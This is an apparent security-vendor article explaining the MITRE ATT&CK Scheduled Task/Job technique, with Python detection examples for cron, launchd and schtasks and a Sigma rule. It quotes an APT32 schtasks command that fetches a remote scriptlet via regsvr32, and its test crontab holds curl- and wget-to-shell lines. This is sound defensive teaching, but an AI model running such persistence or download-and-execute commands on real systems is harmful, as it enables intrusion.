A scheduled task is a command, program or script to be executed at a particular time in the future (e.g. 11/08/2022 1:00 a.m.), at regular intervals (e.g. every Monday at 1:00 a.m.), or when a defined event occurs (e.g. a user logs on to the system). Legitimate users such as system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use the task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence. Our research has found that Scheduled Task was the seventh most prevalent ATT&CK technique used by adversaries in their malware.
In this article, we review:
the fundamentals of the Scheduled Task technique
updates on the technique in the new version of the ATT&CK framework
sub-techniques of the Scheduled Task/Job technique
its use cases by threat actors and malware
red and blue team exercises for this technique
Operating systems provide utilities to automate execution of programs or scripts on a defined schedule:
schtasks.exe (Microsoft Windows)
at.exe (Microsoft Windows)
cron (Unix-like operating systems)
Updates in the New Version of the MITRE ATT&CK Framework
The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques. MITRE ATT&CK sub-techniques are a way to describe a specific implementation of a technique in more detail.
In the new sub-technique version of the MITRE ATT&CK framework, the T1053 Scheduled Task technique has been renamed T1053 Scheduled Task/Job and the following sub-techniques have been added:
At (Windows) was a pre-defined behaviour within T1053 Scheduled Task. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.002 At (Windows).
The remaining behaviour of the previous T1053 Scheduled Task became a new sub-technique, T1053.005 Scheduled Task.
The T1168 Local Job Scheduling technique in the previous version is merged into T1053 Scheduled Task/Job:
At (Linux) was a pre-defined behaviour within T1168 Local Job Scheduling. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.001 At (Linux).
Cron was a pre-defined behaviour within T1168 Local Job Scheduling. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.003 Cron.
T1160 Launch Daemon was a technique in the previous version. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.004 Launchd.
Scheduled Task/Job Sub-techniques
T1053.001 At (Linux)
at is a command-line utility that allows users to schedule commands on various operating systems: Unix-like operating systems (e.g. Linux distributions, macOS and BSD) and Microsoft Windows. This sub-technique covers the at command on Linux, but it may be extended to other Unix-like operating systems. The at utility on Linux schedules a command to be executed only once, at a particular time. An adversary may use at to schedule one-time execution of malicious code in the future.
T1053.002 At (Windows)
Modern Microsoft Windows operating systems provide a graphical user interface (GUI) for Task Scheduler. Moreover, Windows offers two native command-line utilities for task scheduling: at.exe and schtasks.exe. at.exe is deprecated in current Windows versions in favour of schtasks.exe, but it is still present on many systems. There are two requirements to use the at command on Windows:
The Task Scheduler service must be running.
The user must be logged on as a Local Administrator.
Adversaries use at.exe to create recurring tasks that execute at regular intervals. For example, it can be used to relaunch a reverse shell so that the session is re-established if it is lost.
at.exe can run a command not only on the local system but also on remote systems. As a real-world example, the TG-0416 threat group uses at.exe for lateral movement. The BRONZE BUTLER APT group uses the at command to execute a malicious batch file on a remote system during lateral movement.
T1053.003 Cron
Cron is a utility in Unix-like operating systems to configure scheduled tasks. It can be used to schedule a command, script or program to execute periodically. As mentioned above, at is also a task scheduling utility in Unix-like OSs. However, they have different use cases: cron is suitable for repetitive tasks, while at is suitable for one-time tasks. Adversaries use cron to execute their malicious payloads at regular intervals for persistence. As a recent example, attackers use cron to run the downloaded malicious payload every minute in the Ngrok Mining Botnet campaign.
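The cron patterns described above (every-minute schedules, @reboot entries, download-and-execute commands) can be checked mechanically. The following is an added example, not code from the original article or from the Ngrok campaign analysis: a small auditor that parses crontab text and flags jobs that look like adversary persistence. The crontab content, the example.invalid URLs and the flagging heuristics are all constructed for illustration.

```python
import re

# Constructed sample in /etc/crontab format (minute hour dom month dow user command);
# not taken from a real system. The last three jobs mimic the persistence and
# download-and-execute patterns described above.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3     * * 1   root    /usr/local/bin/backup.sh
* * * * *       root    curl -fsSL http://example.invalid/payload.sh | sh
@reboot         root    /dev/shm/.x/run >/dev/null 2>&1
*/1 * * * *     root    wget -q -O- http://example.invalid/x.sh | bash
"""

# curl/wget output piped straight into a shell
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da|k|z)?sh\b")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text, system=True):
    """Return (lineno, schedule, user, command) for each job line.

    system=True expects the /etc/crontab and /etc/cron.d layout with a user
    field; system=False expects 'crontab -l' output, which has none.
    """
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*\s*=", line):
            continue  # environment assignment such as SHELL=/bin/sh
        n_sched = 1 if line.startswith("@") else 5  # @reboot etc. vs five time fields
        maxsplit = n_sched + (1 if system else 0)
        parts = line.split(None, maxsplit)
        if len(parts) < maxsplit + 1:
            continue  # malformed line; a real audit would report it
        schedule = " ".join(parts[:n_sched])
        user = parts[n_sched] if system else None
        jobs.append((lineno, schedule, user, parts[-1]))
    return jobs


def every_minute(schedule):
    fields = schedule.split()
    return (len(fields) == 5 and fields[0] in ("*", "*/1")
            and all(f == "*" for f in fields[1:]))


def assess(job):
    """List the reasons a cron job looks like adversary persistence (empty if none)."""
    _, schedule, _, command = job
    reasons = []
    if schedule == "@reboot":
        reasons.append("runs at boot (@reboot)")
    if every_minute(schedule):
        reasons.append("runs every minute")
    if DOWNLOAD_EXEC.search(command):
        reasons.append("downloads and pipes to a shell")
    if any(d in command for d in WRITABLE_DIRS):
        reasons.append("executes from a world-writable directory")
    if re.search(r"base64\s+(?:-d|--decode)\b", command):
        reasons.append("decodes a base64 payload")
    return reasons


def audit(text, system=True):
    """Return one finding per suspicious job: {'line', 'schedule', 'user', 'command', 'reasons'}."""
    findings = []
    for job in parse_crontab(text, system):
        reasons = assess(job)
        if reasons:
            lineno, schedule, user, command = job
            findings.append({"line": lineno, "schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB):
        print(f"line {f['line']}: [{f['schedule']}] {f['command']}")
        for r in f["reasons"]:
            print("    -", r)
```

Run it against `cat /etc/crontab /etc/cron.d/*` or, with `system=False`, against `crontab -l -u <user>` for every account in /etc/passwd; the @reboot entry is worth singling out because it only fires when the cron daemon starts, so it is invisible to anyone watching for periodic activity.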
T1053.004 Launchd
launchd is the service management daemon of macOS: it boots the system and loads and maintains services. It is similar to systemd on Linux distributions and the Service Control Manager on Microsoft Windows. When a macOS system starts up, launchd is the first process launched after the kernel. Thus, adversaries may use launchd to schedule their malicious executables to run at system startup or user login. As an example, the Olyx macOS backdoor uses launchd to ensure the backdoor executable automatically launches when the user logs in.
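launchd persistence is declared in a property list, so triage comes down to reading the plist keys that make an item start on its own (RunAtLoad, KeepAlive, StartInterval, StartCalendarInterval) and checking where the program lives. The following is an added example, not code from the original article or from the Olyx analysis: it parses two constructed plists (an agent mimicking an Apple label from a user's LaunchAgents folder, and a benign nightly daemon) and reports why the first one deserves attention. The paths, labels and heuristics are illustrative assumptions.

```python
import plistlib
from pathlib import PurePosixPath

# Directories Apple itself populates; anything with a com.apple.* label outside
# them deserves a look.
APPLE_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")
WRITABLE_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")

# Constructed user LaunchAgent mimicking the pattern described above; it is not
# a real malware sample. The keys are standard launchd.plist(5) keys.
SUSPICIOUS_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.apple.softwareupdate.helper</string>
    <key>ProgramArguments</key>
    <array><string>/Users/victim/Library/.cache/update</string><string>-q</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
    <key>StartInterval</key><integer>300</integer>
</dict>
</plist>
"""

# Constructed benign daemon for comparison: a nightly job under /Library/LaunchDaemons.
BENIGN_DAEMON = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.backup</string>
    <key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
    <key>StartCalendarInterval</key>
    <dict><key>Hour</key><integer>3</integer><key>Minute</key><integer>0</integer></dict>
</dict>
</plist>
"""


def program_of(plist):
    """launchd runs Program if present, otherwise ProgramArguments[0]."""
    if "Program" in plist:
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def triggers_of(plist):
    """Which launchd keys make this item start without user action."""
    found = []
    if plist.get("RunAtLoad"):
        found.append("RunAtLoad")
    if plist.get("KeepAlive"):
        found.append("KeepAlive")
    if "StartInterval" in plist:
        found.append(f"StartInterval={plist['StartInterval']}")
    if "StartCalendarInterval" in plist:
        found.append("StartCalendarInterval")
    return found


def assess_launch_item(data, plist_path):
    """Parse one launchd plist and return label, program, triggers and reasons for suspicion."""
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    program = program_of(plist)
    reasons = []
    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_DIRS):
        reasons.append("Apple-style label outside /System/Library (masquerading)")
    if program:
        if any(part.startswith(".") for part in PurePosixPath(program).parts):
            reasons.append("program lives in a hidden directory")
        if program.startswith(WRITABLE_DIRS):
            reasons.append("program lives in a world-writable directory")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: starts at login/boot and is restarted if killed")
    return {"path": plist_path, "label": label, "program": program,
            "triggers": triggers_of(plist), "reasons": reasons}


if __name__ == "__main__":
    for data, path in ((SUSPICIOUS_AGENT, "/Users/victim/Library/LaunchAgents/com.apple.softwareupdate.helper.plist"),
                       (BENIGN_DAEMON, "/Library/LaunchDaemons/com.example.backup.plist")):
        r = assess_launch_item(data, path)
        print(path, r["triggers"], r["reasons"] or "looks benign")
```

On a live host, feed it every plist under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons (the directories launchd reads besides Apple's own), and compare the result with what `launchctl list` reports as loaded.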
T1053.005 Scheduled Task
This sub-technique refers to Windows Task Scheduler. Windows Task Scheduler is a utility that enables users to schedule execution of commands, scripts or programs according to time-based or event-based triggers. A time-based trigger starts at a certain time or at specified time intervals, such as daily, weekly or monthly. An event-based trigger starts at a specific system event, such as when the system starts up or when a user logs on. Task Scheduler also supports multiple triggers, allowing the task to be launched in different ways. Adversaries may use various methods to access the task scheduler:
Running schtasks on the command line (the most common method)
Using a .NET wrapper
Using the Windows netapi32 library
E.g. the Disttrack wiper malware uses the netapi32 library to create a scheduled task to run the payload on the remote system.
Opening Task Scheduler GUI within the Control Panel
Red and Blue Team Exercises
Red Teaming - How to simulate?
In this exercise, we explain a real scheduled task command in a malicious VBA macro in a Word document that was used by the APT32 Threat Group.
This payload was included in the following Word document:
MD5: 6baafffa7bf960dec821b627f9653e44
SHA-1: c944d737dc028d9327dbb95d684ca97232c38620
SHA-256: 1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
Briefly, the command below, taken from the VBA code embedded in the Word document, creates a scheduled task named SystemSoundsServices (mimicking the System Sounds service of Windows) that runs regsvr32.exe every 30 minutes. regsvr32.exe, a signed Microsoft binary, is used to bypass application whitelisting: the /i:<URL> argument together with scrobj.dll makes it execute a Component Object Model (COM) scriptlet that is downloaded from the given URL, and /s, /n and /u keep the call silent and avoid calling DllRegisterServer.
schtasks /create /sc MINUTE /tn "SystemSoundsServices" /tr "\"regsvr32.exe\" /s /n /u /i:http://126.96.36.199:80/g4.ico scrobj.dll" /mo 30 /F
In conclusion, the given command incorporates the following MITRE ATT&CK techniques:
T1053.005 Scheduled Task/Job: Scheduled Task
T1036.004 Masquerading: Masquerade Task or Service
T1218.010 Signed Binary Proxy Execution: Regsvr32
T1559.001 Inter-Process Communication: Component Object Model
Blue Teaming - How to detect?
The following Sigma rule can be used to detect creating a scheduled task that runs regsvr32.exe via schtasks.exe.
title: Scheduled Task Creation to Execute Regsvr32
status: experimental
description: Detects the attempt to create a scheduled task that runs regsvr32.exe via schtasks.exe. This technique is commonly used for persistence, as in the APT32 Threat Group's campaigns.
author: Picus Security
references:
    - https://attack.mitre.org/tactics/TA0002/
    - https://attack.mitre.org/tactics/TA0003/
    - https://attack.mitre.org/tactics/TA0004/
    - https://attack.mitre.org/techniques/T1053/
    - https://attack.mitre.org/groups/G0050/
logsource:
    product: windows
    service: security
    definition1: 'Requirements: Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Detailed Tracking\Audit Process Creation'
    definition2: 'Requirements: Group Policy : Computer Configuration\Administrative Templates\System\Audit Process Creation\Include Command Line'
detection:
    selection:
        EventID: 4688
        NewProcessName: '*\schtasks.exe'
        ProcessCommandLine: '*/create* *regsvr32.exe*'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.persistence
    - attack.privilege_escalation
    - attack.execution
    - attack.ta0002
    - attack.ta0003
    - attack.ta0004
    - attack.g0050
    - attack.t1053.005
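To see what the rule above actually matches, and what it misses, it helps to run its selection logic over a handful of process-creation records and, alongside it, a structural check that parses the schtasks switches instead of pattern-matching the raw string. The following is an added example, not code from the original article and not part of the Sigma rule or of Picus's tooling. The 4688 records are constructed (only the fields the rule uses are included); the first command line is the APT32 one quoted above, the others are invented for comparison and use the reserved example.invalid domain. The tokenizer is a deliberately minimal stand-in for Windows' CommandLineToArgvW.

```python
import fnmatch
import ntpath


def split_windows_cmdline(cmdline):
    """Minimal Windows command-line tokenizer: splits on whitespace outside
    double quotes and treats a backslash-escaped quote as a literal quote.
    Enough for schtasks lines; it is not a full CommandLineToArgvW."""
    tokens, cur, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and i + 1 < len(cmdline) and cmdline[i + 1] == '"':
            cur.append('"')
            i += 2
            continue
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
        i += 1
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_schtasks(cmdline):
    """Map schtasks switches to values: /create -> True, /sc MINUTE -> 'MINUTE', ..."""
    tokens = split_windows_cmdline(cmdline)
    args, i = {}, 1  # tokens[0] is the schtasks image itself
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                args[key] = tokens[i + 1]
                i += 2
                continue
            args[key] = True
        i += 1
    return args


SIGMA_PATTERN = "*/create* *regsvr32.exe*"  # ProcessCommandLine value from the rule above


def is_schtasks_4688(event):
    return (event["EventID"] == 4688
            and event["NewProcessName"].lower().endswith("\\schtasks.exe"))


def sigma_match(event):
    """The rule's selection evaluated by hand (Sigma string matching is case-insensitive)."""
    return is_schtasks_4688(event) and fnmatch.fnmatchcase(event["CommandLine"].lower(), SIGMA_PATTERN)


def parsed_match(event):
    """Structural variant: task creation whose action is regsvr32 (with or without
    .exe) given a /i: scriptlet. Returns an enriched alert dict, or None."""
    if not is_schtasks_4688(event):
        return None
    args = parse_schtasks(event["CommandLine"])
    if "create" not in args or not isinstance(args.get("tr"), str):
        return None
    action = split_windows_cmdline(args["tr"])
    if not action or ntpath.basename(action[0]).lower() not in ("regsvr32", "regsvr32.exe"):
        return None
    scriptlet = next((a[3:] for a in action[1:] if a.lower().startswith("/i:")), None)
    if scriptlet is None:
        return None
    schedule = args.get("sc")
    if args.get("mo"):
        schedule = f"{schedule} every {args['mo']}"
    return {"task_name": args.get("tn"), "schedule": schedule, "scriptlet": scriptlet,
            "remote": scriptlet.lower().startswith(("http://", "https://")),
            "force_overwrite": args.get("f") is True}


# Constructed Security 4688 records (only the fields the rule uses).
EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\schtasks.exe",  # the APT32 command from the article
     "CommandLine": r'schtasks /create /sc MINUTE /tn "SystemSoundsServices" /tr "\"regsvr32.exe\" /s /n /u /i:http://126.96.36.199:80/g4.ico scrobj.dll" /mo 30 /F'},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\schtasks.exe",  # benign admin task
     "CommandLine": r'schtasks /create /sc DAILY /tn "NightlyBackup" /tr "C:\Tools\backup.exe" /st 01:00'},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\schtasks.exe",  # not a creation at all
     "CommandLine": r'schtasks /query /fo LIST /v'},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\schtasks.exe",  # same technique, "regsvr32" without ".exe"
     "CommandLine": r'schtasks /create /sc ONLOGON /tn "Updater" /tr "regsvr32 /s /u /i:http://example.invalid/a.sct scrobj.dll"'},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(f"sigma={sigma_match(e)!s:5} parsed={parsed_match(e)}  {e['CommandLine'][:60]}")
```

The last record is the caveat a practitioner wants: the wildcard `*regsvr32.exe*` is tied to the literal file name, so an actor who writes `regsvr32` (which Windows resolves just the same) slips past the rule while the parsed check still fires. The enriched fields (task name, schedule, scriptlet URL, /F overwrite) are also what an analyst needs first when the alert lands, and they are only available because command-line auditing is enabled as the rule's definition lines require.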